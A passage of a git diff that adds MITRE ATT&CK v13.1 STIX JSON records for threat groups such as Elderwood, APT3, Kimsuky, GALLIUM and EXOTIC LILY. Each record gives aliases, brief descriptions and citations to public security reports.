[BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484.json new file mode 100644 index 0000000000000000000000000000000000000000..a4bb0c6397d60e6feaefadab6e4f24cf80766f4a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484.json @@ -0,0 +1,71 @@ +{ + "type": "bundle", + "id": "bundle--9b0829be-b0a0-4142-97c7-ca9ccfa02048", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Elderwood", + "Elderwood Gang", + "Beijing Group", + "Sneaky Panda" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Valerii Marchuk, Cybersecurity Help s.r.o." + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484", + "type": "intrusion-set", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0066", + "external_id": "G0066" + }, + { + "source_name": "Elderwood", + "description": "(Citation: Security Affairs Elderwood Sept 2012) (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)" + }, + { + "source_name": "Elderwood Gang", + "description": "(Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)" + }, + { + "source_name": "Beijing Group", + "description": "(Citation: CSM Elderwood Sept 2012)" + }, + { + "source_name": "Sneaky Panda", + "description": "(Citation: CSM Elderwood Sept 2012)" + }, + { + "url": "http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html", + "description": "Paganini, P. (2012, September 9). Elderwood project, who is behind Op. Aurora and ongoing attacks?. Retrieved February 13, 2018.", + "source_name": "Security Affairs Elderwood Sept 2012" + }, + { + "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", + "source_name": "Symantec Elderwood Sept 2012" + }, + { + "url": "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "description": "Clayton, M.. (2012, September 14). Stealing US business secrets: Experts ID two huge cyber 'gangs' in China. Retrieved February 15, 2018.", + "source_name": "CSM Elderwood Sept 2012" + } + ], + "modified": "2021-03-02T22:40:11.097Z", + "name": "Elderwood", + "description": "[Elderwood](https://attack.mitre.org/groups/G0066) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. (Citation: Security Affairs Elderwood Sept 2012) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710.json new file mode 100644 index 0000000000000000000000000000000000000000..1030d4ff79a275ed3b1ab993c0583d6889a9be50 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--4209620b-68ca-4ee3-8d37-1c70c414eaf6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T18:51:09.213Z", + "name": "SideCopy", + "description": "[SideCopy](https://attack.mitre.org/groups/G1008) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://attack.mitre.org/groups/G1008)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://attack.mitre.org/groups/G0121), a suspected Indian threat group.(Citation: MalwareBytes SideCopy Dec 2021)", + "aliases": [ + "SideCopy" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "type": "intrusion-set", + "id": "intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710", + "created": "2022-08-07T13:52:07.791Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1008", + "external_id": "G1008" + }, + { + "source_name": "MalwareBytes SideCopy Dec 2021", + "description": "Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.", + "url": "https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258.json new file mode 100644 index 0000000000000000000000000000000000000000..60c2380e444369f72bda85ff2563e7467dfa529d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--8b75c87a-b24f-4c55-9d6c-760d747c3a81", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "GALLIUM", + "Operation Soft Cell" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Cybereason Nocturnus, @nocturnus" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258", + "created": "2019-07-18T20:47:50.050Z", + "x_mitre_version": "3.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0093", + "url": "https://attack.mitre.org/groups/G0093" + }, + { + "source_name": "Operation Soft Cell", + "description": "(Citation: Cybereason Soft Cell June 2019)" + }, + { + "source_name": "GALLIUM", + "description": "(Citation: Microsoft GALLIUM December 2019)" + }, + { + "source_name": "Cybereason Soft Cell June 2019", + "url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "description": "Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019." + }, + { + "source_name": "Microsoft GALLIUM December 2019", + "url": "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "description": "MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021." + }, + { + "source_name": "Unit 42 PingPull Jun 2022", + "url": "https://unit42.paloaltonetworks.com/pingpull-gallium/", + "description": "Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)", + "modified": "2022-08-12T21:26:22.303Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "GALLIUM", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json new file mode 100644 index 0000000000000000000000000000000000000000..ff902581ca282c5a482ed78d302145b6b36b8081 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8afbf3f3-8bae-40e3-bb90-2ab3c42d6dce", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT17", + "Deputy Dog" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "type": "intrusion-set", + "created": "2017-05-31T21:31:57.307Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0025", + "external_id": "G0025" + }, + { + "source_name": "APT17", + "description": "(Citation: FireEye APT17)" + }, + { + "source_name": "Deputy Dog", + "description": "(Citation: FireEye APT17)" + }, + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "modified": "2020-10-13T22:33:14.018Z", + "name": "APT17", + "description": "[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9.json new file mode 100644 index 0000000000000000000000000000000000000000..accef4c9561625d90a85d46c0895ccac76db472e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9.json @@ -0,0 +1,101 @@ +{ + "type": "bundle", + "id": "bundle--9e437a17-a0a8-449c-96cd-0b372efaa050", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT3", + "Gothic Panda", + "Pirpi", + "UPS Team", + "Buckeye", + "Threat Group-0110", + "TG-0110" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Patrick Sungbahadoor" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9", + "type": "intrusion-set", + "created": "2017-05-31T21:31:55.853Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0022", + "external_id": "G0022" + }, + { + "source_name": "APT3", + "description": "(Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "Gothic Panda", + "description": "(Citation: PWC Pirpi Scanbox) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "Pirpi", + "description": "(Citation: PWC Pirpi Scanbox)" + }, + { + "source_name": "UPS Team", + "description": "(Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "Buckeye", + "description": "(Citation: Symantec Buckeye)" + }, + { + "source_name": "Threat Group-0110", + "description": "(Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "TG-0110", + "description": "(Citation: Recorded Future APT3 May 2017) (Citation: Symantec Buckeye)" + }, + { + "source_name": "FireEye Clandestine Wolf", + "description": "Eng, E., Caselden, D.. (2015, June 23). Operation Clandestine Wolf \u2013 Adobe Flash Zero-Day in APT3 Phishing Campaign. Retrieved January 14, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html" + }, + { + "source_name": "Recorded Future APT3 May 2017", + "description": "Insikt Group (Recorded Future). (2017, May 17). Recorded Future Research Concludes Chinese Ministry of State Security Behind APT3. Retrieved June 18, 2017.", + "url": "https://www.recordedfuture.com/chinese-mss-behind-apt3/" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "description": "Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.", + "source_name": "FireEye Operation Double Tap" + }, + { + "source_name": "Symantec Buckeye", + "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.", + "url": "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + }, + { + "url": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "description": "Korban, C, et al. (2017, September). APT3 Adversary Emulation Plan. Retrieved January 16, 2018.", + "source_name": "APT3 Adversary Emulation Plan" + }, + { + "source_name": "PWC Pirpi Scanbox", + "description": "Lancaster, T. (2015, July 25). A tale of Pirpi, Scanbox & CVE-2015-3113. Retrieved March 30, 2016.", + "url": "http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html" + } + ], + "modified": "2021-10-01T19:09:20.817Z", + "name": "APT3", + "description": "[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)\n\nIn 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)", + "x_mitre_version": "1.4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f.json new file mode 100644 index 0000000000000000000000000000000000000000..9e65ea353255da8ce03a17283d8d438e0ba8f7f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7c16e806-e7ea-4af5-9e72-cdaf1210d2b4", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "GCMAN" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f", + "type": "intrusion-set", + "created": "2017-05-31T21:32:05.611Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0036", + "external_id": "G0036" + }, + { + "source_name": "GCMAN", + "description": "(Citation: Securelist GCMAN)" + }, + { + "source_name": "Securelist GCMAN", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.", + "url": "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" + } + ], + "modified": "2020-03-30T19:03:44.853Z", + "name": "GCMAN", + "description": "[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f.json new file mode 100644 index 0000000000000000000000000000000000000000..7cdd11b0e8c1b452863e00a01ce13eff58543125 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f.json @@ -0,0 +1,120 @@ +{ + "type": "bundle", + "id": "bundle--86c14626-5a41-4ed8-8d0e-f8fd83383717", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-30T22:53:00.875Z", + "name": "Kimsuky", + "description": "[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)\n\n[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "aliases": [ + "Kimsuky", + "STOLEN PENCIL", + "Thallium", + "Black Banshee", + "Velvet Chollima" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Taewoo Lee, KISA", + "Dongwook Kim, KISA" + ], + "type": "intrusion-set", + "id": "intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f", + "created": "2019-08-26T15:03:02.577Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0094", + "external_id": "G0094" + }, + { + "source_name": "Thallium", + "description": "(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)" + }, + { + "source_name": "Black Banshee", + "description": "(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)" + }, + { + "source_name": "STOLEN PENCIL", + "description": "(Citation: Netscout Stolen Pencil Dec 2018)" + }, + { + "source_name": "Kimsuky", + "description": "(Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021)" + }, + { + "source_name": "Velvet Chollima", + "description": "(Citation: Zdnet Kimsuky Dec 2018)(Citation: ThreatConnect Kimsuky September 2020)(Citation: Malwarebytes Kimsuky June 2021)" + }, + { + "source_name": "AhnLab Kimsuky Kabar Cobra Feb 2019", + "description": "AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.", + "url": "https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf" + }, + { + "source_name": "EST Kimsuky April 2019", + "description": "Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.", + "url": "https://blog.alyac.co.kr/2234" + }, + { + "source_name": "Netscout Stolen Pencil Dec 2018", + "description": "ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.", + "url": "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + }, + { + "source_name": "BRI Kimsuky April 2019", + "description": "BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.", + "url": "https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/" + }, + { + "source_name": "Zdnet Kimsuky Dec 2018", + "description": "Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.", + "url": "https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/" + }, + { + "source_name": "CISA AA20-301A Kimsuky", + "description": "CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-301a" + }, + { + "source_name": "Cybereason Kimsuky November 2020", + "description": "Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.", + "url": "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + }, + { + "source_name": "EST Kimsuky SmokeScreen April 2019", + "description": "ESTSecurity. (2019, April 17). Analysis of the APT Campaign \u2018Smoke Screen\u2019 targeting to Korea and US \ucd9c\ucc98: https://blog.alyac.co.kr/2243 [\uc774\uc2a4\ud2b8\uc2dc\ud050\ub9ac\ud2f0 \uc54c\uc57d \ube14\ub85c\uadf8]. Retrieved September 29, 2021.", + "url": "https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf" + }, + { + "source_name": "Malwarebytes Kimsuky June 2021", + "description": "Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.", + "url": "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/" + }, + { + "source_name": "Securelist Kimsuky Sept 2013", + "description": "Tarakanov , D.. (2013, September 11). The \u201cKimsuky\u201d Operation: A North Korean APT?. Retrieved August 13, 2019.", + "url": "https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/" + }, + { + "source_name": "ThreatConnect Kimsuky September 2020", + "description": "ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.", + "url": "https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af.json new file mode 100644 index 0000000000000000000000000000000000000000..89930debdf625eeb84674d0df45539f77854fd32 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--3bc59957-fb7e-4f8d-8ca5-15fb6fc84aa7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T18:48:18.917Z", + "name": "EXOTIC LILY", + "description": "[EXOTIC LILY](https://attack.mitre.org/groups/G1011) is a financially motivated group that has been closely linked with [Wizard Spider](https://attack.mitre.org/groups/G0102) and the deployment of ransomware including [Conti](https://attack.mitre.org/software/S0575) and [Diavol](https://attack.mitre.org/software/S0659). [EXOTIC LILY](https://attack.mitre.org/groups/G1011) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.(Citation: Google EXOTIC LILY March 2022)", + "aliases": [ + "EXOTIC LILY" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Phill Taylor, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af", + "created": "2022-08-18T15:25:59.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1011", + "external_id": "G1011" + }, + { + "source_name": "Google EXOTIC LILY March 2022", + "description": "Stolyarov, V. (2022, March 17). Exposing initial access broker with ties to Conti. Retrieved August 18, 2022.", + "url": "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756.json new file mode 100644 index 0000000000000000000000000000000000000000..3e382e02efcffe1b0342277e446d119dc309a727 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--48d4071d-6dd9-448f-9b8b-9b86c7a5dfe8", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "admin@338" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Tatsuya Daitoku, Cyber Defense Institute, Inc." + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756", + "type": "intrusion-set", + "created": "2017-05-31T21:31:53.579Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0018", + "external_id": "G0018" + }, + { + "source_name": "admin@338", + "description": "(Citation: FireEye admin@338)" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "modified": "2020-03-18T19:54:59.120Z", + "name": "admin@338", + "description": "[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0.json 